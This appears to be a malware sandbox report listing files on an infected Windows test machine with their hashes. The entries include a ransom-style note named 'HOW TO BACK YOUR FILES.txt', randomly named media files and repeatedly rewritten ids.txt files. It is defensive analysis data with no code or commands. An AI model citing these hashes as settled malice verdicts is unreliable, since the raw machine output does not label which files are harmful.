C:\Users\FD1HVy\Music\Ps7z1Y\xS0okhLxs9IE8.m4a 52.89 KB MD5: 3ff56719890b28f8c25fbd2957c9a7a9
SHA1: daec128edbcd4202c7e5e8696f73cb676d820c72
SHA256: 1cfb06f7fdddd856a5902f8aedd421b09a9381c310c4b124cbd74f5b9914cb7f
SSDeep: 1536:Ej6UHjO7aGC6vdbOwSeXuVzVRDOMsbSXufsG:Ej6hC9LDOMKPJ
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\BTTuE.wav 59.19 KB MD5: 21e1de5e6dcc7566c871c86f88afbc0d
SHA1: 26325caa2e361a892856ae10e843e44f1634d0db
SHA256: b3fdea456ca16d940f30dac40480fd443fd399c1dcfc4a3272a6c4079690d097
SSDeep: 1536:AGNbmhLqJJWStJklOfSk2wSNrp15YGK03lOdh7ZN7y2oDk1P:AGNbmdqJJLWlM2Lnrbj309ZN7yq
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\ZaPyz5 MC4yqLqS.m4a 46.38 KB MD5: fd5e61d8f8a37ffe6fce3ef670af7d30
SHA1: a014ecf649e112fc53040badf9c028f165a5d647
SHA256: 80a6a634581e769b48b58311cc33dd99cb8c5d7b7e523fad910173678eb47683
SSDeep: 768:T1vu6Nj+LQFCo8pVCmfTfCoTeBQv9WD75HJr2vypM+A8bDLS+o/uFQ6q8sXjAQ1D:T1vqLQFWrTKoTRv9WJHF2vGX++oV6q8e
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\GXnNaU1iM6.wav 33.98 KB MD5: ee7e704d86cf0603da818355f4a2d0e4
SHA1: 404db44f3200dd16a2b1387a764d914d27b53c9d
SHA256: a4d5ccb815a85aea0fbef606cd1cfd60662fd02da93164e3525cea39cc4b411d
SSDeep: 768:s5NtITpd5epRXmMqanALniBZet0fYQ05AUOpQj0dgTw8:sF0ephmMqaiiBZQ0u1oA
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\lxupC1v-qiWR2UlBD.wav 100.25 KB MD5: 50827ad31c28bbf0eadafb70176cb08b
SHA1: ac895bbb22f73f8d57003c7e3110f2d31fee7540
SHA256: b7aaac08263a5b5227b43d3ba5afb9d6a0c9086d70678f695bb6d3a2c1e173f2
SSDeep: 3072:Sq0KMlfGRI9paWIHj2NXWpDPS962MCmU3Ke:s7VGeiWaj2NGx25Ke
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\OAj iWDFaki.m4a 40.95 KB MD5: ed52df2630c7b770b9bd6308798c0f9b
SHA1: 925afc18e9024a8506eba2b36188010d51561b23
SHA256: ee20911be48fe8e1d85d25f62e200e90dab968b66b7673316200d9d91901e4d2
SSDeep: 768:VG6IAFYAzbnE99rRh7xJ2qP+kGX5X+3li/EmzPfY:E6IAFYEETrRJH2e+kBiM2PfY
False
C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\-edB1.wav 58.34 KB MD5: 597b7108341f0033af05c699f0737fe3
SHA1: 4b8ad8766db98e1058fec67a6196f59c5251198f
SHA256: 4cc5852b6d8364deb82782344ea9f19f7526653c3de1ea8e1f38ee2ea8690ca2
SSDeep: 1536:ExQhdBhwd1UPS/H8QSYk7cmc95pvPsaLzRhtMiY80SydqEWW:EABh2U6/NSl7cmUTvEaLLtMiES8WW
False
C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\2qH DKgW.mp3 9.41 KB MD5: 43e02c64c023e19b72a18e3ebf99f9f2
SHA1: 9fadaa5d9e1c5c4c315f83ad4bc36e5e3714a8a6
SHA256: b6799f55d05357eea65748d4846dcd9803392262176adf7c5bff82bb7d45ed58
SSDeep: 192:xJDzDxVglt73x1ZYK8cECq08/cogA0NqFPmVyCtE/Ig9/szGZVxKMFWcA9VWQ9jy:HztV83x1KKx8UjA0NgmYQa/tVxKMQLRy
False
C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\2kQpVkJLVFCbCOvx.m4a 31.73 KB MD5: 65565eb480a1ac52474eacbbc8afc95f
SHA1: 213f2254800a63615210435ece37f6939afbf24a
SHA256: 4b82b22a6593af894d0c8ca3b2f87c9a86ed6a4bdb15b887b58aef091b78e451
SSDeep: 768:04xl+Aqe7LPZBE1ikdNRFlC8DKlyXN0yoTSsG6tZ:Jl+ArZBdW9dzPE0k
False
C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\aW4QN.mp3 99.27 KB MD5: 5c1d4855bdce0086539e1c93044523f3
SHA1: 56c9757faa3ae8b96a99db495cc0b700017caa95
SHA256: 02e6e2a7a82fde2fff9eb81b88138a337a0d6f128eaa3b5cca29d0ad1f2dab4c
SSDeep: 1536:ep5c8hXU6JN48P8rudry0o6FHYKfMAUtVvExv0tq6bmM3VFqEmRwcEDS9f9NLnWx:ebo6/48P8ryG09YKCnEKtjQwYvWx
False
C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\TI1y-X-BXK09.wav 77.45 KB MD5: c6882d793c148f8630971792aab25a50
SHA1: c57342e1e6cc2e467bf99a71f61379269730becd
SHA256: 6d551d6486d7e1ef45a92bb332a9ad2c61104a49eaf2b97b4e855c9c4cfba5c3
SSDeep: 1536:XK3gHtaXn7Tz9i3oYarU4bfh9k9czwRat0kfsULX/PndPaJS8iWZSdli:KZrc3hslJ9yRq0Cs0d4S8b+8
False
C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\tMHF 2k.mp3 90.95 KB MD5: c6280b742ccc654107491eb15c69858e
SHA1: d34ff4dcf11bf3be3594ac965a3bf64c180a1a98
SHA256: 15078880e376630355628ffe68eb5a6502450765393fafe508dcee3953d6a367
SSDeep: 1536:eVoBUoNHN5fvYthPCgm3FjQxk876ASIEI08RijBjSdYjtCLO7vQlEXWLoYLQNNQ4:SoBUodNBQlm3RizOAY2IBoCtCLO7vywB
False
C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\4f5YCJ0pI.wav 93.52 KB MD5: 477269e4586af733c2375d9e82597e9f
SHA1: f1cf149d40bddb333f43ea3ae8bf2ed1a5ff294a
SHA256: 3a5c6fb9bbd426a5e22062d884228a07ecf3c143d19e373f69e3eb5e500d54d4
SSDeep: 1536:s/zhXYeZwdrKkJyy9/Gthug4Kyh01bWgb11ogajJ3pZBQMPy52AeZdwbmHEb5:k5fyYkgGQX4l01NLoh3jBlPZGJ5
False
C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\bpiTJAjWP1.m4a 1.95 KB MD5: 198645fe811f03a62872af8639aebd9d
SHA1: b050fdf47ad2e9e5575078c8602915b463478db3
SHA256: 5ac118078effcd654b2029c08ac846f512069982e98ae18e9e417753549f7e19
SSDeep: 24:4qyocQf18yvHK0vn2AHN94cvd0JgjO/eiRqbcPnuKhFL3HeyrpLnUmOt3W9+93LF:4XQ6ynumbDvSJZq4PZ3bFLnHM7Nvf
False
C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\oe8JSBpRp6FDH0.wav 97.00 KB MD5: c4041e0e32133c1f2efa6594541c677e
SHA1: 5e7e1753d3bc95ef90894cb313b08dc62933925a
SHA256: c50afbfb5052f8a894c9cea05bd98b151a0fa053fb8d696cb3031699740eb029
SSDeep: 1536:mnuiL5sxwV+UrzlOKW2K5FCA9pMQG/7SdSp/FO1iQDD7IIgMI51IvHILmcdB:muiOGlzbNMFhPMQA/G1iQDPIxZ0HILmI
False
C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\WYQAYXsDjvTvV PGyfOr.m4a 82.06 KB MD5: c35f0c63e0d6e45b203da7a61c764304
SHA1: 03b2e36b6117bb150870893aafbd0dc14fb774b5
SHA256: 93f5495cd70b5d2bdb3f7ac850273547dfccc320c30165a3b57b4102ebb93f03
SSDeep: 1536:SIHrF3L08ZWCWHLOqEN46n7fMoyxmU8TslOF8z2p+rUtpYxkAyvOIIx/VrFK:rrFYXm4c7Eou9ZzGjY6PvNGVrc
False
C:\Users\FD1HVy\Music\ddgoRP\IFQuAHV5i3JZ nilsZg.mp3 39.91 KB MD5: 8a956b9396fbef275451b8c04501f841
SHA1: 8d2598ed91eba1a1491bbc8e4f36be82c7b47107
SHA256: f0262b10d08d7d0ab475b8ddadb7a844b8d805ee75c9f64b954896a29a5c0582
SSDeep: 768:MDV+dC8SAtkPRQsrX2M2oSN6nvcUBpmcZ58bkha939TjfaRg:MK7u72oSNfmpmY8bke34g
False
C:\Users\FD1HVy\Music\ddgoRP\iJM5 PvfbTCo- In.wav 81.89 KB MD5: de2e1692b981fcc61d9190f2f75d4308
SHA1: 481565523d4057bb42b6fe671767dda1296f7070
SHA256: 83cb6486b1b644abdece2b755c9889af6e90fcc34109c15a49491947a2522dc6
SSDeep: 1536:Dg8NQlBFqZoqdSGMzYqPttZGKsevUCvYUBDWJzEKiLed2exTF25GgEvQCCHfSs:IlB0ZoqdBMLTZgUZKiWxMo7vQCWfT
False
C:\Users\FD1HVy\Music\ddgoRP\q8tNQuca9CLizMc.wav 12.47 KB MD5: eac611e56420f382ee78089913b62b26
SHA1: 6a819a127dc89f05ccdc99fa6d2667deeae7d824
SHA256: 5224440f2ddab7224d80749619b1d30d41c80a065e16f8cc8efcdd6f9abce11b
SSDeep: 384:b/OdZOY4hK9ssSqYHpVYgfze+U1xiwQSIlaCOAm:b/OLOY4hFsSqYJVVf9U7iKIlvm
False
C:\Users\FD1HVy\Music\ddgoRP\ysJ3TUUOloNGuy.m4a 90.31 KB MD5: 7d046e453e08a73e0c6d876b6f8a710c
SHA1: ca0670afc083562d7c2cf6fb23fbe58475ff37e8
SHA256: 00f10ba9661b90d4ae611dfcea95f21984209ca77a04e0fa3c8316ca52302a60
SSDeep: 1536:7KmtcEukJxSKvRONbnQK2opA6NH7SElK44OlVLwUMcNyI3850:m9pkJxVRmcKfEw4Obw9c738u
False
C:\Users\FD1HVy\Music\atFhmMZ\Iq3Mk4kIcDleAb4.wav 14.86 KB MD5: 00bebe764ab911f8ee8ad8354f1ec9ef
SHA1: cd9f71a04c8c3a1a566ce50ef4790c6d6702d66a
SHA256: fc26fd22c98756a8a58096f47a6b69cefdc36226dbe6fdc00015620adad4cce9
SSDeep: 384:of2vMxKneUkwETEzeivMd2QaU4gjO+AAYN9ww8:sxKnee567T4gjXYN9ww8
False
C:\Users\FD1HVy\Music\atFhmMZ\jG41f5VsquvTqCZwY.wav 95.89 KB MD5: 807bc855575a1d5c3d3ff167953ab50d
SHA1: f38c667d63f7bbf32c3f3a5861655629129836ef
SHA256: e4f160ebe8dd48eeb930ef3b2621382b7f065ad2c96147023ad23627610c62cf
SSDeep: 1536:DgcBrQVOJtI8FNYHWg79k2lNexbl+xLNx4CF3htar5R7eU95/2DoND9+o14XhN1c:DJrjJPFNYHl79O+xLNx4CF3htaTaec+r
False
C:\Users\FD1HVy\Music\atFhmMZ\kQd6LBtQrAN6lnmGB.mp3 91.34 KB MD5: d68518bb43c5d82a1afa46015bbd7965
SHA1: 921ae8ecbfe2aabf3878aef922e1fe9e2399bf63
SHA256: af0c2c010b870de4280b93b249b002932f3e199bf0230c928a1ff080e2e5078f
SSDeep: 1536:y5ePvDaCI/NNPAW0J2+lBw24SHECHNEdippdWbXmRjgEd5hpa:y5pCiNNPA/K2hHHHJdWbxE3ho
False
C:\HOW TO BACK YOUR FILES.txt 1.82 KB MD5: 52cae17626e5941936016425d95ad8a7
SHA1: 60188de09c1922462e591cf677099a4384fdb594
SHA256: 071e176c74e0770596add16e212f66df3b227ee13f416b3f6aff9e4e937bba88
SSDeep: 24:pnP8+DE1gHn3pheVcHPt6zPhkFTdmjTuFuykKEmZGdHYhOZaw356poyoKw0ToZ0i:pnP3EiXyCKPVyAyRZkOi8w0RLVAFpd
False
C:\ProgramData\local\.BFC0E91B00AE8A0620D3 980 bytes MD5: 55e1f05e46c82de75b3e2bffd94780c9
SHA1: 058dc8be7d661397e0cc627be32e93bbe0b847f7
SHA256: 05d0aa8178e961a774920dd632d6e6c7bd5cf0d07f46fad5a8f8b0281f4dfb72
SSDeep: 24:nUmOt3W9+93LnszrS8GPXPnwnNlCHqhP/XSiGlA:nHM7NvPnwXF3Sih
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm 68.94 KB MD5: f062d2916be607105002d959c6ceab07
SHA1: 574fd9f18bf9354574d93808e165225d0523b775
SHA256: 5eace8c626323c782fdedec5c0230ba89eaad059a9d320be0e4005fdda500030
SSDeep: 1536:4fZK4On7gz0D8CkaQrw3nmoUbVWX4rQnox06XAX6bAcIDdDvYG:4k4OM0oraL3nmhVWX4rQoK86wG
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\4-CHQqK1j2.avi 52.52 KB MD5: 641bd7dab8bec28f6fb3c06e53bb138a
SHA1: 4c0873b07f0e1e171ff092cea72ea48c4f0ab7a7
SHA256: 09b449d9ed219c8938479c9851e07ea06a9753433b235983249106d75d1dd3fc
SSDeep: 1536:s0q7my7TOgsQl+4b6qiTH1yLWBsy/K98JuKT+Fw:Q7TRA9qiLgWGIK980rFw
False
C:\ProgramData\share\.BFC0E91B00AE8A0620D3 980 bytes MD5: b91c27ae3d413da15210fed28ee73b35
SHA1: 29980bd8a6874a87c9a1ee0fd0136fbb736f0b60
SHA256: 211bd48585cb2258da16028abfd57aed754cdf0a64d885ec8a6226fa53caaf64
SSDeep: 24:zWxv/mfWAoc0edxEcAAFH464MSrKlCmAW7C6iKwZPgGlc:zKvCvocfEcZYhKljhw+V
False
C:\Users\FD1HVy\Desktop\ids.txt 1.04 KB MD5: 5c65d82fba7398230a7780058bab8a29
SHA1: 3e76070a87dea23f7b69ac0e4d12a4149d72f36a
SHA256: 20b032da10ae651978bba9cac9ee4f01e6936e8d1447b85b425e1f596870f41b
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavn:QZkOi8w0RLVAFptv
False
C:\Users\FD1HVy\Desktop\ids.txt 1.08 KB MD5: 3ec0280a98e376949ac5f8d219738e48
SHA1: 4720e9e4f9c50c145ec6c3ee0385468c2b9a7d56
SHA256: b85587f0bba68e0306dbcc445e0b96f26908262c0801f77ca282369bd83a553e
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJs:QZkOi8w0RLVAFptxs
False
C:\Users\FD1HVy\Desktop\ids.txt 1.13 KB MD5: dabef022d78348ccf3df696cbd307195
SHA1: 8c406fa64fd6d101edac43d02166a0eeae1d6c02
SHA256: 2bcdd9e65e7e975d8076c33037b91af67cfea362a7b1d3e3b52e02ed64c33789
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyC:QZkOi8w0RLVAFptxF
False
C:\Windows10Upgrade\bootsect.exe 116.45 KB MD5: f2d158c417c99393c2c9f2d9e9b24ffe
SHA1: 6edfd98e4de06e9b99b9a8df5eef248389eab97b
SHA256: 56d5380825c2341d68c3944dd1dd91cdeb6241c9ed68e36d2c5aa81eb4af9dc4
SSDeep: 3072:4ldSl4T6nlFGw98ZvJ4yaF2sD3Q7Hu8rClHK:udSy+8wmvQ77HK
False
C:\Windows10Upgrade\DWTRIG20.EXE 45.45 KB MD5: c7e352421f7538818041bc38a0cec471
SHA1: cb281fea9533cc3a616f5f6f903be6d4a7f21d14
SHA256: 9551c14559e30f27a54e4caa76317a3b9c5ea6f50b3ead53cda20cd13f446099
SSDeep: 768:8E/RC+fVRI0DzNaXY/RKtyjfGhXcMTAO0dAGEYOnDvJZeTh3X2dTkQwHOX4c430P:8WRC+fVK03a0Ktyj8XcMTPGUFwNsXwul
False
C:\Windows10Upgrade\GatherOSState.EXE 552.45 KB MD5: 1755224d25a3e3138386cdff48a8caa7
SHA1: 6ca0bba227548c1146bf3acf8acbdea8e6c1fdb0
SHA256: 14ecffa0fb1bb4f81ccf564356b6101fbdbf7898b7b6c1c3fbf27352e5a7fb2e
SSDeep: 12288:EOUMyA/OAezZSKWjsXNXd6ViXwDqFGir4O3N/9zon8NvPeT:EXMyw+1WmaoXFFzr4O3N/GKeT
False
C:\Windows10Upgrade\HttpHelper.exe 27.95 KB MD5: 3a067d0d6c2008e5a225987ce7ed6e78
SHA1: 1e6a828c205e22e29fd817742d44f69d8582a2fe
SHA256: b5958964ed5568c2c614e4b81162e2875cbc84c37c1a355e4ff2f1a914eb7673
SSDeep: 768:hwpNPzcoNllipIJYNh2V/UT0IRfFZgS24VI8U2QlW1:SpRQoNHipcYNEV/Ujzgy4W1
False
C:\Windows10Upgrade\PostOOBEScript.cmd 1.33 KB MD5: 560f058b5766d6411f746da956051064
SHA1: 970e807029592ebb42cdd0b763dc4edb97dd375e
SHA256: 1af980907595a22303ab97dbf776a0191efc08403967662976054d0399bec574
SSDeep: 24:jE/UfHf7gd1t+aVvCDe/0APlaM8JyoapCJEGUmOt3W9+93LnszrS8GPXf:joU8dGarVlaM8EODHM7Nvf
False
C:\Windows10Upgrade\upgrader_default.log 245.08 KB MD5: 5bd26f4c12f8f5fdcc02bab01ddea80b
SHA1: 547280df08e4eef092bec34604240941836b9a6a
SHA256: 5d0e27d8eeeb6f81ba35f70c6c14d10dd2c7432c37a1c1a5b3663291d5275b69
SSDeep: 6144:jepRllr3QzVpgafQ5fbQEZmlCvLfBKj8IyvowBDtqzkXPh:6pnNAzX5Q5DVmqLMjBWoADtsOh
False
C:\Windows10Upgrade\upgrader_win10.log 20.83 KB MD5: 22b6bd132822f31b37c772f5f91101e7
SHA1: 853f5358ae88fc4262d3ba06711665f89100b95b
SHA256: ca6ad84f8950ba2e2b412566758dd7bc6232e6883233a880c8027fe082c3a638
SSDeep: 384:4czMoQj5DT6+AsABqOsN7MQJC4ShbmYFBzHzQkpVYoq2tClWg:4+NWxpAsWQ9Sh6YFB70kO+WWg
False
C:\Windows10Upgrade\WinREBootApp32.exe 25.45 KB MD5: 40b2afc251060d9ae1a849feac9083ad
SHA1: 90b9c02a4e4a4e6fb233b5abb67047b093390736
SHA256: b2200a40c6d265f80f00388308256f0271bca2650150aad151256964d5c1ad65
SSDeep: 384:b80r1WXWnGhmKZfwpsnyG1dWu8Qimq48FxRBEldpcmxugL3pBIvfRyH2hbck8YW:b80r11GJ6pZGOQinxRB8pcWugGpy26kw
False
C:\Windows10Upgrade\WinREBootApp64.exe 25.95 KB MD5: 029bd20a602539d9ad01c8dc77314ff2
SHA1: 090cee0e9f18c8fd3e585fcd7bdb25476d8c46b6
SHA256: 3b6602354bad7c43e0b58b49afa5b79268acd0925fd02f7878b4c144554220e5
SSDeep: 384:pnwrAOoQdZMuf3fH5FbGPSF+ubIQoBHD/44TO0sA9ivaK5BcULF8CX:J+MSPHj4uG540O0sc1KQUf
False
C:\Windows10Upgrade\resources\ux\default_eos.css 7.30 KB MD5: adffe7c78996cca061a4747d1711ad91
SHA1: fb956736eb728e9f6c647054bffbb8a615980e7c
SHA256: 9d8e8e9944d11f76e0f59f6ff958fe49bebce5bd6617fa2cd0df0353c87b0457
SSDeep: 192:vRtxiCSOxUw3tVHL5I0hFhLoPWe9AqSuMzElyP/GPTcMlf:pZSOhkSFTeGuMIEP/mp
False
C:\Windows10Upgrade\resources\ux\default_oobe.css 5.86 KB MD5: af7fe598794db8c4c244afb71156d34c
SHA1: 702458681e813a938deb5d3a66eb41cdf92128d3
SHA256: 7c2733a9bb49829fcb4d18653379b1b00d3efb9addb70ba785576d8cb02c9251
SSDeep: 96:G5pU2y+r4VXsoDai3PLODYqo3MqMvP8fnPmhZqoecGaZIIxBM7Nvf:kWkr4V8omDYqrZvWPmhZBbyIxBMlf
False
C:\Windows10Upgrade\resources\ux\lock.png 4.34 KB MD5: 3cb9c5e7473d01cfde18c10b3706856d
SHA1: b126c9882cb0eb7a7d1634227b8b5b0e62e20202
SHA256: 01d4b39d32ec3827872cf8e5bc13108e9bcfb7439a14b2da64d14e56fd8d5b36
SSDeep: 96:PNO4S7R9sGDJHJ/51hG70OogNJpHMkCrbrngSbdRM7Nvf:kT9Z71hM0O5d9CLgyDMlf
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png 2.88 KB MD5: 42468f28a471d708d6c38110c5c6ed85
SHA1: c2e6336ace38d98981884479a4ab41bd18918649
SHA256: a804ee213ca1b8c90753b80c202b711068276c33182edea9a988ef4743c9a41e
SSDeep: 48:DMrcx76mgxqyn4RLEQe+pIeLtMnilLDFMHM7Nvf:nx+maqynqLEQe+P4iNwM7Nvf
False
C:\Windows10Upgrade\resources\ux\pass.png 2.53 KB MD5: d5cf0bd3fd56fda821cb3b00bc0359ff
SHA1: 316c5e87f907f7391b13192c32747e1266c38898
SHA256: f1be092456857a19a60c26a8982e258c5ca451bc28ec875d65b8183dc13a1bfb
SSDeep: 48:NCe+65KzUJ4XuafLbneJuArOl2QEQtMlL4bFVX/HM7Nvf:NrSfLb8EBEbybFBvM7Nvf
False
C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml 92.44 KB MD5: 30687d1717f6cf892fbb1c2b6997ec06
SHA1: 4848aacfc37a4f9aeb4b681c30344bc91490f21f
SHA256: de1ec0145bbad6fda20c6e1f7dcc5900a4c485eebd40f39f179a2be18ea2e25e
SSDeep: 1536:ZPwKP4aoqmDiVO5p2synEcJoRHMI5jcnCYUCmnNluG27nGz44DgPfSAfsC98Gixm:ZFoqmeQ5pyducnCYUzGzIcPqNo/Be8nH
False
C:\Windows10Upgrade\resources\amd64\nxquery.cat 10.44 KB MD5: 38aa95d43db67faef320def98ba7820f
SHA1: e0c318147b9a803161540e1ccabf71722b5572ac
SHA256: 592f8dab73770ec592f1aea83d3f943d8971f4cf9e7242973b5cc8e6245b4c1b
SSDeep: 192:L6LZMQMmaR4+m1z6Nw9BBKIgtsn+edIvNFNY1wNXl0CfO3KMlf:L6cmaRzV+BiCr8NFVNXOC0D
False
C:\Users\FD1HVy\Desktop\ids.txt 1.16 KB MD5: 16ff21e2541df7dc63bff2340e589805
SHA1: 6ea53bc00db60ccf440e6effde17699953b06de8
SHA256: 73873428672a738244212942a1fd748b2561fa509ec293e32fb5705c2f8f8cd1
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyU5:QZkOi8w0RLVAFptxv
False
C:\Users\FD1HVy\Desktop\ids.txt 1.20 KB MD5: 3272311b07bdf80a4abbb3f296283160
SHA1: 73a23a55aa6a821aae19789b463669e400b8bbc9
SHA256: 2cdd6aff4cb33fcae05da5f099f9b45297fee37f2069f838ade9331485c987bd
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTC:QZkOi8w0RLVAFptxa
False
C:\Users\Public\Libraries\RecordedTV.library-ms 1.69 KB MD5: 3a0cf070f1747909366e50dc3cc6752a
SHA1: f232c28699203b1d7423e22bce5e7a73cc469793
SHA256: 9f0cf20f2564f4f9adcbb81be4f71ac4245ad716e850dc3e358c6f581d8926cd
SSDeep: 48:o9c+U6RW68PDE5sVsZgO+MWPMK/nkKT4dLHM7Nvf:Ic+U66DSuRO+fMK/b4pM7Nvf
False
C:\Users\FD1HVy\Desktop\ids.txt 1.25 KB MD5: 97453ec9075e73e70493736d92497a55
SHA1: fca66aa6bcc888eb12c0a8946f42f361c952547a
SHA256: 0e6f79608d8ce7304f219b3a6a25469ff1e2e0941a1b2c41611f178ef8588b2b
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdeS:QZkOi8w0RLVAFptxyS
False
C:\Users\FD1HVy\Desktop\ids.txt 1.36 KB MD5: ba9ed97e380f4500d2045da9c0177f2b
SHA1: 5f6e3d342239100be178d7c403902fa0cf8d5ea4
SHA256: af6652fd1457008ae0ec1c17044fa21d296b742d4f2074c2b9ace2b605ac1741
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdE:QZkOi8w0RLVAFptxy/
False
C:\Users\FD1HVy\Desktop\ids.txt 1.45 KB MD5: d5d4d230d04d544606861ebd96286b91
SHA1: 9dd0d6e12a0bcf29e9da1fa6ecebb877bab44ebc
SHA256: 8fb4a4dbbb99c93253874a92ba8e619e138f06c077bfff1747e03711112f0dd6
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHh:QZkOi8w0RLVAFptxyRmB
False
C:\Users\FD1HVy\Desktop\ids.txt 1.50 KB MD5: cc90d5be718140e3edc39a338ed9545d
SHA1: 07b17ee376fc0cd9fc13061f742007cd256899bd
SHA256: c93fbad2c7f9ea873a251a0d646afd197894dd86c3a36d7bc42aecc000e05d33
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdS:QZkOi8w0RLVAFptxyRmg
False
C:\Users\FD1HVy\Desktop\ids.txt 1.55 KB MD5: 53967624bb3a554887cc0cf32fba52e5
SHA1: 5d10b659ee22e499c3dcd74516092e76c24c80d7
SHA256: 46c825a0ae39530c9931914ba2047b2162e967fcc5d1cbf8e1a621f369254770
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dY:QZkOi8w0RLVAFptxyRmI3C
False
C:\Users\FD1HVy\Desktop\ids.txt 1.69 KB MD5: 2ec6a2d636843782a497477839e302de
SHA1: 754085604bb5b3e18d52809b63792f1465565297
SHA256: 4e7587beb9e678c109cd4ebe07d735c0a00cdc65f5a4afc961e6015031608527
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWE:QZkOi8w0RLVAFptxyRmI3S6Q8
False
C:\Users\FD1HVy\Desktop\ids.txt 1.96 KB MD5: 9c9219669c6b976f03ad8e8ba5255caa
SHA1: 30fddc0fa611eb29f7082d0a7784272ff6ebf30e
SHA256: 782cd11413942e18f0cd9b9878c5c22ba70894ad9d7eb851280c03ae1e7d692f
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWF:QZkOi8w0RLVAFptxyRmI3S6QM666X
False
C:\Users\FD1HVy\Desktop\ids.txt 2.04 KB MD5: 182b6ad952d0eea66e3fe5ad2eaf7613
SHA1: 056071fe0374f3900d7fdc2856af1ac7fae1aeda
SHA256: 91eae8841d5f3eaaf6ef00a21622655a903db0d7bb4ff3dc0e5379a06d17669e
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWN:QZkOi8w0RLVAFptxyRmI3S6QM666X
False
C:\Users\FD1HVy\Desktop\ids.txt 2.08 KB MD5: 5ec2b1b2561eaa010e58f962f6948f68
SHA1: fa28f47f172653d50b3138cf28d7d43d9708fbe5
SHA256: ada0d98f3dfee6ea60cf6e78a70225e04a744db99365d98952f308b4f4d0e3be
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWF:QZkOi8w0RLVAFptxyRmI3S6QM666jr
False
C:\Users\FD1HVy\Desktop\ids.txt 2.13 KB MD5: d41b10398aa81a50aa6d99933f61f256
SHA1: f048d4a509e18092a885f9bb07cb60d8aaf2efaa
SHA256: 707cb3cd574b11356fb89adedb1156af228919cf53d43d5643a0ddb596a8e635
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWF:QZkOi8w0RLVAFptxyRmI3S6QM666j7
False
C:\Users\FD1HVy\Videos\7GblG1j-U_m.avi 88.17 KB MD5: a10088f65955c5de0729efad11e8ccba
SHA1: 25846f959927cedc698647caa5527a43a27e11bc
SHA256: ddb13facde237d0d5ee15bf13cf162f48cc2ff2960f2e0496c84e20bc87a1a4d
SSDeep: 1536:YIsYodbiu3XENZXoLVTPl0bEu+Y1rScd/W40QgUxkSH3zznZhR562KEr2/CVxL:Od2unQwebf+Iru40QgUx1H3zrZhDJK0V
False
C:\Users\FD1HVy\Videos\tKr\hafWBqXU o.swf 56.86 KB MD5: 46829d6aa2571dffede823e98527b34d
SHA1: 73896760bf67ddc701d0d72dcee8b3b419a6739c
SHA256: 1f27eef57ec4430d82378839616fec5726b13c0dab172e7b181881c9f37956a6
SSDeep: 1536:lqHEwx3BYzspz65AoldTdrWP3T6DFO9gpXIxyjZn5:YHEFc65AyYP3ODFnpXPZn5
False
C:\Users\FD1HVy\Videos\tKr\LgD6JoRdSVkauQ4AZ.mkv 66.03 KB MD5: fc7f2e5a8a9c8f279b32ad2ee2ecd7c2
SHA1: 42ffe78d6d61873c52de1735df2c8ee941c1a2c1
SHA256: 4c93278feb29ff18036d196c0bb65ddb78c20ce91810e4ea49222f8669c88c74
SSDeep: 1536:Oor8mg3yBdnXNIvKUjfLgXCz4NRXXmKMT7EyFcrnt/Zaghk6Z5AktIA:pXQyrXNIC+doRHmKw6h/ZHAPA
False
C:\Users\FD1HVy\Videos\tKr\p_iTlT1Y7Bmx3OF.swf 90.05 KB MD5: 64213512857e37c1429bcfe94dae6099
SHA1: 330844dc1596237b48af1ac7ed7ac69516609da0
SHA256: 76167e250d0f40e2a71ece126beefe26dd51e3e864e5c8526c57178c4e3afd16
SSDeep: 1536:qPQLuFgcBPBounK+qucfSy/TA4J7B6T5wCVAaxeGHyhtRHlNv60Iwh:eQLuFxBpK+quwSoTAO7BOvVASQHlNv60
False
